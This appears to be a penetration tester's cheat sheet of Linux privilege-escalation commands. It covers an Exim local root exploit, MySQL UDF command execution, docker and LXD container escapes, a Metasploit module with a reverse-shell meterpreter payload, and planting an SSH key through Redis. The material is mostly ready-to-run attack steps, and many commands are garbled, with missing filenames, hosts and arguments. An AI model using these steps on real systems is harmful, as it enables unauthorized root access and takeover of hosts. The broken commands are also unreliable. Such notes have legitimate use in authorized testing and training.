Table of Content



echo [ CVE-2016-1531 local root exploit
cat > /tmp/ << EOF
package root;
use strict;
use warnings;
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
chmod 777
./ -m netcat

nc -lvvp 4444


# If MySQL is running as root, you can run commands
sys_exec('usermod -a -G admin username')
Select sys_exec('whoami');
select sys_exec('/bin/bash');
Select sys_eval('whoami');

# MySQL run as root and version is <5 go for User Defined Functions (UDF)

# searching and compiling exploit
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname, -o 1518.c -lc
chmod 777

mysql –u root –p
use mysql;

# Exploitation
create table foo(line blob);
insert into foo values(load_file('/tmp/'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/';
create function do_system returns integer soname '';
select do_system('chmod u+s /usr/bin/find');

# Privesc
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;


# If the user can run docker
docker run –v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'

# Docker privesc on metasploit
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) >  run
# Check available images
docker images

# You can mount the / of the host inside a container
docker run -v /:/root -i -t ubuntu /bin/bash


# You can abuse Redis by writing malicious RSA keypair to the disk

# Prepare the public key by adding newlines with the help of the following command
(echo -e "\n\n"; cat; echo -e "\n\n") > public.txt

# Load the malicious public key into redis
cat public.txt | redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub

# Set path to dump the content with the help of the following command
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"

# Configure the dbfilename as authorized_keys
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys

# Save the configuration and exit.
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save

# Then authenticate
cd .ssh
ssh root@


# Searching LXD exploit and get exploit (attacker machine)  
searchsploit lxd
searchsploit -m 46978
bash build-alpine

# Victim machine
nano # (cp the exploit content)
chmod 777
./ -f alpine-v3.10-x86_64-20190905_0123.tar.gz

# Crawl the host filesystem
cd /mnt/root/